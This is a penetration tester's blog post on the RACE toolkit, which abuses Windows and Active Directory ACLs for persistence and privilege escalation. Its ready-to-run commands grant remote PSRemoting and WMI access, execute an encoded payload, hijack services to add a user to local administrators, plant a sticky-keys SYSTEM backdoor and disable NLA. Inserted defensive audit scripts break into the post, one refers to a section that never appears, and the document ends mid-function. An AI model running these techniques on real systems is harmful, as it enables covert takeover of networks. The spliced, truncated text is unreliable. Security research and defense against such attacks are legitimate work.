Lab of a Penetration Tester - Home of Nikhil "SamratAshok" Mittal
Author: Nikhil SamratAshok Mittal (http://www.blogger.com/profile/02092541175521734123)
Published: 2019-08-23T23:07:00.000+05:30, updated: 2019-08-29T12:29:03.544+05:30
RACE - Minimal Rights and ACE for Active Directory Dominance<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I recently spoke at DEF CON 27 on abusing Security Descriptors and ACLs i.e. permissions on Windows machines. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You can find the slides <a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance.pdf">here</a> (also at the end of the post with minor updates). The demo videos which I used for my talk can be found <a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance-Demo-Video/">here</a> and are also used below. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The RACE toolkit is available on my GitHub repository.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This blog post covers whatever I could not do in my talk. There is only so much you can cover in 45 minutes. On top of that, there was some confusion and my talk was cut short by 10 minutes -.-</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
tldr; It is possible to execute interesting persistence and on-demand privilege escalation attacks against Windows machines by only modifying ACLs of various objects. We will need administrator privileges initially. <br />
<br />
So, let's begin.<br />
<br />
We are going to use 'labuser' as the attacker controlled user and 'ops' is the target domain.</div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
About Windows Access Control Model:</h4>
<div style="text-align: justify;">
Microsoft's <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-components">documentation on Access Control Model</a> explains it really well. But below is a quick summary:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Every authenticated user gets an access token. Each process or thread created by that user has a copy of that access token. The token contains identity (SIDs) and privileges of the user. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now, when a process tries to access a <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/securable-objects">securable object</a> (files, registry keys, services, domain objects etc.) it uses the access token. A securable object, by definition, has a security descriptor. A security descriptor can contain an <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists">Access Control List (ACL)</a>, which is a list of <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/ace-strings">Access Control Entries (ACE)</a>. There are two types of ACL: the Discretionary Access Control List (DACL) and the System Access Control List (SACL). </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
DACL controls access to an object and SACL controls logging of access attempts. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, when a process or thread tries to access a securable object, the system checks the permissions of the access token (and therefore of the user) against each ACE in the DACL. The process gets access if an ACE explicitly allows the requested rights, or if the object has no DACL at all. All other cases result in access denied. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
An ACE contains access control information. The relevant information to this discussion is access mask. <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/access-rights-and-access-masks">The access mask in an ACE contains access rights</a>. This governs what a user can do on an object. For example, a user may have permissions to stop a process whereas another may have the access rights to configure a process. This is what defines access in Windows. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<h4 style="text-align: justify;">
Minimal Permissions</h4>
<div style="text-align: justify;">
Once we have understood the concept, let's think what makes a Domain Admin so powerful? </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A Domain Admin is so powerful because it has permissions to modify almost all objects on machines in a domain. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Do we need Domain Admin privileges for all the interesting things? Not really! We can use just enough rights to perform a particular task. That is, in place of having FullControl or GenericAll over an object we can use Minimal Permissions required to perform a task. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For example, what allows a user to connect to a remote machine using PowerShell Remoting? By default, administrator rights are required. If we have a look at the ACL of the PowerShell Remoting endpoint we see that the Administrators group has FullControl over it:</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrrDoskf8tosvfMtnLIHPN0V1fLqKVa5-Kedk_ZCOQxU_yi_e_EbV5_iXLgskKYY3pGPYQW9tDsFyN0KRMNHknw08D7TnfszErW8W_JsD97C5o6-Cl6r5TqBjuU0DYLHvnFnnj7lsju1I/s1600/PSRemoting_DACL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="562" data-original-width="453" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrrDoskf8tosvfMtnLIHPN0V1fLqKVa5-Kedk_ZCOQxU_yi_e_EbV5_iXLgskKYY3pGPYQW9tDsFyN0KRMNHknw08D7TnfszErW8W_JsD97C5o6-Cl6r5TqBjuU0DYLHvnFnnj7lsju1I/s400/PSRemoting_DACL.png" width="321" /></a></div>
Do we actually need 'FullControl' to access the target machine using PowerShell Remoting? No! We can connect to the target machine by adding an ACE for a user which we control and provide it Read, Write and Execute permissions. This will allow the user to access the target machine using PSRemoting without admin privileges. Please note that the user's privileges on the target machine will not be elevated!<br />
<br />
This is what we are going to focus on. Some interesting backdoor/persistence techniques, some on-demand privilege escalation methods by modifying ACLs of various securable objects.<br />
<br />
<h4>
Introducing the RACE toolkit</h4>
To make it easy to execute ACL related attacks, I have written the RACE toolkit. RACE is derived from Minimal <b>R</b>ights and <b>ACE</b>. You can find it on my GitHub: <a href="https://github.com/samratashok/RACE">https://github.com/samratashok/RACE</a><br />
<br />
RACE is a PowerShell module for executing ACL attacks against Windows targets. <br />
<br />
RACE uses the ActiveDirectory module for some of the attacks (Set-ADACL and Set-DCPermissions functions). You can get it from a machine where AD DS RSAT is available or from here: <a href="https://github.com/samratashok/ADModule">https://github.com/samratashok/ADModule</a></div>
<br />
<h4 style="text-align: justify;">
Persistence - PowerShell Remoting</h4>
<div style="text-align: justify;">
As we saw above, it is possible to access a target machine as a non-admin user using PSRemoting by modifying the ACL of the PSRemoting endpoint. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Using the below commands from RACE, we can modify the ACL of the default PSRemoting endpoint. Let's run it on the DC with DA privileges (please ignore 'I/O operation has been aborted'):</div>
</div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">. .\RACE.ps1
Set-RemotePSRemoting -ComputerName ops-dc -SamAccountName labuser -Verbose
</textarea></pre>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHNKIW3TIuvI0c3tsNHpokdo5HbQnqSGVIGTH5uHUa40o3Y2UQl16e2BpnDzeeoxUr5zbq2EqyUX_azT6uIuq8FXkoYZWZ9Fs1DUlH9NvKQRwnuNUYK_Qg_YXcoMSJgzvo33z3i87WqE/s1600/Set-PSRemoting-DA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="1461" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHNKIW3TIuvI0c3tsNHpokdo5HbQnqSGVIGTH5uHUa40o3Y2UQl16e2BpnDzeeoxUr5zbq2EqyUX_azT6uIuq8FXkoYZWZ9Fs1DUlH9NvKQRwnuNUYK_Qg_YXcoMSJgzvo33z3i87WqE/s400/Set-PSRemoting-DA.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
Now, we will be able to access the target machine 'ops-dc' as labuser using PowerShell Remoting. Please note that the privileges will still be of labuser.</div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Enter-PSSession -ComputerName ops-dc
</textarea></pre>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj17h924OsnLJSBZW9r_GZP5Uk9cEIx9oFiD_funJzyLsyvo755yIuuDy174dugfJbXoKQjuK8bmvMSoPO16MYvXDaOB0rVKezdpCfcLRCHIIC2sSvo0OBid-3GEF2Vn6Eiq65ydcp04js/s1600/Set-PSRemoting-labuser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="534" data-original-width="1600" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj17h924OsnLJSBZW9r_GZP5Uk9cEIx9oFiD_funJzyLsyvo755yIuuDy174dugfJbXoKQjuK8bmvMSoPO16MYvXDaOB0rVKezdpCfcLRCHIIC2sSvo0OBid-3GEF2Vn6Eiq65ydcp04js/s400/Set-PSRemoting-labuser.png" width="400" /></a></div>
<div style="text-align: justify;">
Here is a video of the above attack: <br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/CqVV6Iqwsn0" width="560"></iframe><br />
<br />
<br />
There are no logs for the ACL modification of PowerShell endpoints. However, when accessing the target machine there will be Events 4624 (Logon) and 4634 (Logoff). </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
How is this access useful? We can chain this with other modified permissions. We will come back to that later.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
UPDATE 29/02/2019 - Forgot to mention that this is useful against PowerShell Web Access too. If we have the credentials of labuser and PSWA is enabled on the target machine, we can access the target machine using those credentials. </div>
<h4>
Persistence - WMI</h4>
<div style="text-align: justify;">
Similarly, we can modify ACLs to access a machine using WMI without admin privileges. In the case of WMI, we need to modify the ACLs of the DCOM endpoint and also of the namespaces. For namespaces, we can do it for all of them or only for a specific one. The below command does it for all the namespaces:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteWMI -ComputerName ops-mssql -SamAccountName labuser -Verbose
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjueJNwfx4rR6sXE9sUqNWl5pVjkFcuOX9tP2178xh82_EPYYNHdvIKp3NJeouGStPpr0tJ1rkMMp9_L3otuJZ-716R6IwPY7zJlHBCIadkSOYIf59vkUH_ILRcZa3ezjPTeHcgKDC8tWg/s1600/WMI-DA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="312" data-original-width="1457" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjueJNwfx4rR6sXE9sUqNWl5pVjkFcuOX9tP2178xh82_EPYYNHdvIKp3NJeouGStPpr0tJ1rkMMp9_L3otuJZ-716R6IwPY7zJlHBCIadkSOYIf59vkUH_ILRcZa3ezjPTeHcgKDC8tWg/s400/WMI-DA.png" width="400" /></a></div>
Now, we can simply run commands as 'labuser' on the target machine:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Invoke-WMIMethod -ComputerName ops-mssql -Class win32_process -Name Create -ArgumentList 'powershell -e base64encodedpayload'
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx1pZm78hFxunA-Oc92nLONYeXI2aZt9fN8jrl7kVx8Lt49ky4BolMq706Wkyg_Vz5LpudGvWO2PHhfMRsvQznIsbpw_zwwF4hOHZ183wq1tlwgVapSI-lfRYm6lyXUZK-Ewdn0ARYTUM/s1600/WMI-labuser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="445" data-original-width="1320" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx1pZm78hFxunA-Oc92nLONYeXI2aZt9fN8jrl7kVx8Lt49ky4BolMq706Wkyg_Vz5LpudGvWO2PHhfMRsvQznIsbpw_zwwF4hOHZ183wq1tlwgVapSI-lfRYm6lyXUZK-Ewdn0ARYTUM/s400/WMI-labuser.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
<b>WMI Permanent Event Consumers - </b>In my testing, with modified permissions to the root\subscription namespace it was possible to create permanent event consumers but the payload never executed. This is something which someone else can explore. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Like PSRemoting, there are no logs for ACL modification but logs 4624 and 4634 will be there when we use WMI to access the target machine.</div>
<div style="text-align: left;">
</div>
<h4 style="text-align: justify;">
<br />
On-demand Privilege Escalation - Windows Services</h4>
<div style="text-align: justify;">
Windows services are very useful for persistence AND getting admin privileges back.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Here is how we can abuse admin privileges with Windows services: </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
- Initially with admin privileges, we can create new services or modify existing services to run as SYSTEM. </div>
<div style="text-align: justify;">
- We also modify ACLs of such services to allow permissions to config and restart for a user we control. </div>
<div style="text-align: justify;">
- As the user we control, reconfigure the target service on the target machine to change its executable path to our payload. </div>
<div style="text-align: justify;">
- Restart the service to execute the payload. </div>
<div style="text-align: justify;">
<br />
<b>Creating new service:</b></div>
<div style="text-align: justify;">
Use the below command to provide labuser GenericAll rights over scmanager (needs admin rights):</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-build -ServiceName scmanager -Verbose
</textarea></pre>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmek396a3jNTLqAHYR7yr3Uluq-TVmidVw72FDq4wehek6UqaWEG8NegEgrO_aDelA_vZ7lo43PdqybdKjocddGFFv60d6Im4XpFfr_mHmx5gBZq19gwnyzM-WYb2B611otv6JvPBQfg8/s1600/Set-RmeoteServices-SCManager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="221" data-original-width="1439" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmek396a3jNTLqAHYR7yr3Uluq-TVmidVw72FDq4wehek6UqaWEG8NegEgrO_aDelA_vZ7lo43PdqybdKjocddGFFv60d6Im4XpFfr_mHmx5gBZq19gwnyzM-WYb2B611otv6JvPBQfg8/s400/Set-RmeoteServices-SCManager.png" width="400" /></a></div>
SCManager is a special service which provides the ability to create new services on a machine. After the above command, labuser can create services on the target machine:</div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteServiceAbuse -ComputerName ops-build -UserName 'ops\labuser' -CreateService evilsvc -SamAccountName labuser -Verbose
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge8kYOnlozGZigU4oWcLjpFe0-Di1oPPZaGK0ZXJYmwSUZLopxcP5A9-lyTl5NtH8qHnpFMqNv0c1no6hJX_dCQnZhCHoDZqbsDEO8NUQGrlWB8Hzf_sR8xiwyG5Uz0fhSgG74yCwYFpQ/s1600/Set-RmeoteServices-SCManager-labuser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="189" data-original-width="1600" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge8kYOnlozGZigU4oWcLjpFe0-Di1oPPZaGK0ZXJYmwSUZLopxcP5A9-lyTl5NtH8qHnpFMqNv0c1no6hJX_dCQnZhCHoDZqbsDEO8NUQGrlWB8Hzf_sR8xiwyG5Uz0fhSgG74yCwYFpQ/s400/Set-RmeoteServices-SCManager-labuser.png" width="400" /></a></div>
The above command sets the service start type to auto and the account to LocalSystem. The binpath or executable of the service is set to the specified payload. By default, the payload is to add the user specified by UserName parameter to the local administrators group.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After the above command, we can either wait for a service restart or a system reboot.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you don't want to wait, run the below command (suggested by the tool) with admin privileges on the target machine to get restart permissions for the created service for our user: </div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteServicePermissions -SamAccountName labuser -ServiceName evilsvc -ComputerName ops-build -Verbose
</textarea></pre>
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ6A_aEMIAffwF4gzjYk7Kqe7ugOOtFy4JVM1x6TM0n8vOgjGwVCPQ2JyoCQ1l1BKWtZ3Yim4MhIbCYONHuu0rYZhF7YmjwyDY3QJdxvGufylgA-nW27sNnXEd4jA-q5mWFzb9YWNZqaM/s1600/Set-RmeoteServices-SCManager-ACL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="139" data-original-width="1437" height="37" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ6A_aEMIAffwF4gzjYk7Kqe7ugOOtFy4JVM1x6TM0n8vOgjGwVCPQ2JyoCQ1l1BKWtZ3Yim4MhIbCYONHuu0rYZhF7YmjwyDY3QJdxvGufylgA-nW27sNnXEd4jA-q5mWFzb9YWNZqaM/s400/Set-RmeoteServices-SCManager-ACL.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Now, when we restart the 'evilsvc' service, 'labuser' is added to the local administrators group on the target machine.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">sc.exe \\ops-build start evilsvc
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEnlfFHtKJhwT9T-1XHf0_ttHGbu0KrzZdLZXAg3V0bNfMWypTKquBlaXNJtUbSIu6SP82j5wyO3ZNob7zeD3Wp-MU5MCzEQT0UhFqJ4LclBvldAvV5j3s27H2dD44OCLwOvl1YPLKLhc/s1600/Set-RmeoteServices-SCManager-labuserlocaladm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="448" data-original-width="1021" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEnlfFHtKJhwT9T-1XHf0_ttHGbu0KrzZdLZXAg3V0bNfMWypTKquBlaXNJtUbSIu6SP82j5wyO3ZNob7zeD3Wp-MU5MCzEQT0UhFqJ4LclBvldAvV5j3s27H2dD44OCLwOvl1YPLKLhc/s400/Set-RmeoteServices-SCManager-labuserlocaladm.png" width="400" /></a></div>
<br />
<b>Modifying existing service:</b> <br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With admin equivalent permissions (CCDCLCSWRPWPDTLOCRSDRCWDWO) on any service, we can abuse it to escalate privileges. Please refer to the <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/ace-strings">documentation</a> for a full list of the rights. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The below command modifies the ACL of ALG service on the target machine to provide 'labuser' enough rights to configure and restart the service:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-build -ServiceName ALG -Verbose
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOsb5kEuLxBQVFpixkTrWdPBQekrZJML4pQ6KSj3SIdhCHyT4DPK6w-C4jRLM4Aqc8BMk5eDln2JKcI6HMtgoiSCLkmiwyvjB01JQnK73rhaOaqxn3_YkdXNUKI9M_K4XyVoMS3EoU3I0/s1600/Set-RmeoteServices-ALG.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="1440" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOsb5kEuLxBQVFpixkTrWdPBQekrZJML4pQ6KSj3SIdhCHyT4DPK6w-C4jRLM4Aqc8BMk5eDln2JKcI6HMtgoiSCLkmiwyvjB01JQnK73rhaOaqxn3_YkdXNUKI9M_K4XyVoMS3EoU3I0/s400/Set-RmeoteServices-ALG.png" width="400" /></a></div>
Next, run the below command as labuser:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteServiceAbuse -ComputerName ops-build -UserName 'ops\labuser' -ServiceName ALG -Verbose
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5m3x1NOVYOYBh9Z-equFt4_5q1F9rD9XKpRJ5aTPIYkdCh7BtOhRENwYUlFJYR-kXZHmh46PT8voPTQT9FLUoXwdCymLOQlr_URx5DW_OAWvXMASggVaDr2lmo0MvITiLgTn17bVqH48/s1600/Set-RmeoteServices-ALG-localadm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="502" data-original-width="1562" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5m3x1NOVYOYBh9Z-equFt4_5q1F9rD9XKpRJ5aTPIYkdCh7BtOhRENwYUlFJYR-kXZHmh46PT8voPTQT9FLUoXwdCymLOQlr_URx5DW_OAWvXMASggVaDr2lmo0MvITiLgTn17bVqH48/s400/Set-RmeoteServices-ALG-localadm.png" width="400" /></a></div>
<br />
Now, when we restart the ALG service, labuser is added to the local administrators group on the target machine.<br />
<br />
Below is a video of the attack:</div>
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/qIzyZhbnQ18" width="560"></iframe><br />
<br />
<div style="text-align: justify;">
<br />
I prefer using an existing service in place of creating a new one. <br />
<br /></div>
<div style="text-align: justify;">
Please note that both methods are verbose in the logs. Service creation, service configuration changes and service stop/start are all logged. Therefore, this method is not recommended on DCs or when you want to be stealthy. </div>
</div>
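As an added example (not part of RACE or the original post), the following PowerShell audits a machine's service DACLs for the grant described in this section and in the access-control summary above: a principal outside an expected set holding change-config, start/stop, WRITE_DAC or WRITE_OWNER on a service. It assumes sc.exe is available on the audited host and that the caller can read service security descriptors; the expected-principal list is an assumption to tune per environment.

```powershell
# Added example, not part of RACE: decode service DACLs (the SDDL sc.exe prints)
# and flag principals outside an expected set that can reconfigure or restart
# a service. Run on the host being audited with rights to read service ACLs.

# Service-specific access-mask bits with their SDDL two-letter names. The full
# rights string quoted above, CCDCLCSWRPWPDTLOCRSDRCWDWO, is all of these.
$ServiceRights = @(
    @{ Bit = 0x00001; Name = 'CC' },   # SERVICE_QUERY_CONFIG
    @{ Bit = 0x00002; Name = 'DC' },   # SERVICE_CHANGE_CONFIG
    @{ Bit = 0x00004; Name = 'LC' },   # SERVICE_QUERY_STATUS
    @{ Bit = 0x00008; Name = 'SW' },   # SERVICE_ENUMERATE_DEPENDENTS
    @{ Bit = 0x00010; Name = 'RP' },   # SERVICE_START
    @{ Bit = 0x00020; Name = 'WP' },   # SERVICE_STOP
    @{ Bit = 0x00040; Name = 'DT' },   # SERVICE_PAUSE_CONTINUE
    @{ Bit = 0x00080; Name = 'LO' },   # SERVICE_INTERROGATE
    @{ Bit = 0x00100; Name = 'CR' },   # SERVICE_USER_DEFINED_CONTROL
    @{ Bit = 0x10000; Name = 'SD' },   # DELETE
    @{ Bit = 0x20000; Name = 'RC' },   # READ_CONTROL
    @{ Bit = 0x40000; Name = 'WD' },   # WRITE_DAC
    @{ Bit = 0x80000; Name = 'WO' }    # WRITE_OWNER
)
# Change config, start, stop, rewrite the DACL or take ownership: any one of
# these in a non-admin ACE is the "configure and restart" grant described above.
$Dangerous = 0x00002 -bor 0x00010 -bor 0x00020 -bor 0x40000 -bor 0x80000

# Assumed baseline of principals that normally hold such rights; tune per host.
$ExpectedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')

function Get-ServiceDaclReport {
    param([Parameter(Mandatory)][string]$ServiceName)

    # sc.exe sdshow prints a blank line followed by the SDDL string
    $sddl = (& sc.exe sdshow $ServiceName | Where-Object { $_ -match '^D:' }) -replace '\s', ''
    if (-not $sddl) { Write-Warning "No security descriptor readable for $ServiceName"; return }

    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        try   { $who = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $who = $sid.Value }    # orphaned SID: report it raw, it is still a finding

        $granted = foreach ($r in $ServiceRights) {
            if ($ace.AccessMask -band $r.Bit) { $r.Name }
        }
        [pscustomobject]@{
            Service    = $ServiceName
            Principal  = $who
            Type       = $ace.AceType
            Rights     = ($granted -join '')
            Suspicious = ($ace.AceType -eq 'AccessAllowed') -and
                         (($ace.AccessMask -band $Dangerous) -ne 0) -and
                         ($ExpectedPrincipals -notcontains $who)
        }
    }
}

# Walk every installed service and keep only the entries worth a human look.
Get-Service | ForEach-Object { Get-ServiceDaclReport -ServiceName $_.Name } |
    Where-Object Suspicious | Format-Table -AutoSize
```

An ACE for a domain user on a service such as ALG, or on the scmanager object, with DC, RP or WP in its rights column is the footprint of the modifications shown in this section.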
<div style="text-align: left;">
</div>
</div>
<br />
<h4 style="text-align: left;">
On-demand Privilege Escalation - Registry Autoruns</h4>
<div style="text-align: justify;">
Windows registry is a very attractive target for persistence with on-demand privilege escalation. As a very simple example, let's have a look at Image File Execution Options which is a <a href="https://www.rapid7.com/db/modules/post/windows/manage/sticky_keys">popular</a> <a href="http://www.labofapenetrationtester.com/2012/05/fun-with-sticky-keys-utilman-and.html">method</a> of running a payload as SYSTEM using 'sticky keys'. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The idea is to modify the ACL of the registry key responsible for Remote Registry (HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg) and of the one for sethc.exe (HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe) to be able to change the registry remotely without needing admin privileges. To be able to trigger this remotely in an RDP logon session, NLA needs to be disabled by modifying HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp.<br />
<br />
Run the below commands with admin privileges on the target machine to set up the registry key permissions:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">Set-RemoteRegistryPermissions -SamAccountName labuser -ComputerName ops-mssql -Verbose
Set-RegistryImageFileExecution -SamAccountName labuser -ComputerName ops-mssql -Verbose
</textarea></pre>
</div>
<br />
<div style="text-align: justify;">
Then run the below command as labuser to set payload for sethc and to disable NLA:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Invoke-RegistryAbuse -ComputerName ops-mssql -Method ImageFileExecution -Verbose
</textarea></pre>
<div style="text-align: justify;">
Now, try to connect to the target machine using RDP and press the Shift key five times to get a command prompt with SYSTEM privileges!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The particular method we used is not very silent (even some AVs flag modification of Image File Execution Options registry key) and actually downgrades the security of the target machine. So please use this carefully in an actual operation. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Implementing a better registry key based command execution method is among the future goals of the RACE tool.</div>
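As an added example (not part of RACE or the original post), this PowerShell lists which identities hold write access on the registry keys named in this section (and the Lsa key named under the registry persistence section below), so that an ACE granted to an ordinary domain user stands out. It runs locally on the audited machine; the list of expected identities is an assumption to tune per host.

```powershell
# Added example, not part of RACE: list non-admin identities holding write
# access on the registry keys this post names as persistence targets. Run
# locally on the machine being audited with rights to read those keys' ACLs.

$Ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$KeysToAudit = @(
    'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg',
    'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp',
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
    $Ifeo
)
# Every per-image subkey under IFEO carries its own ACL (e.g. sethc.exe), so audit them all.
$KeysToAudit += Get-ChildItem -LiteralPath $Ifeo | ForEach-Object PSPath

# Specific rights that change a key or its ACL. Generic rights (GENERIC_ALL,
# GENERIC_WRITE) show up on some inherited rules as raw bits, so check them too.
$WriteRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor
               [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
               [System.Security.AccessControl.RegistryRights]::Delete -bor
               [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
               [System.Security.AccessControl.RegistryRights]::TakeOwnership
$GenericWrite = 0x10000000 -bor 0x40000000   # GENERIC_ALL | GENERIC_WRITE

# Assumed baseline of identities expected to write under HKLM; tune per host.
$ExpectedIdentities = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                        'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')

function Get-RegistryKeyWriters {
    param([Parameter(Mandatory)][string]$Path)
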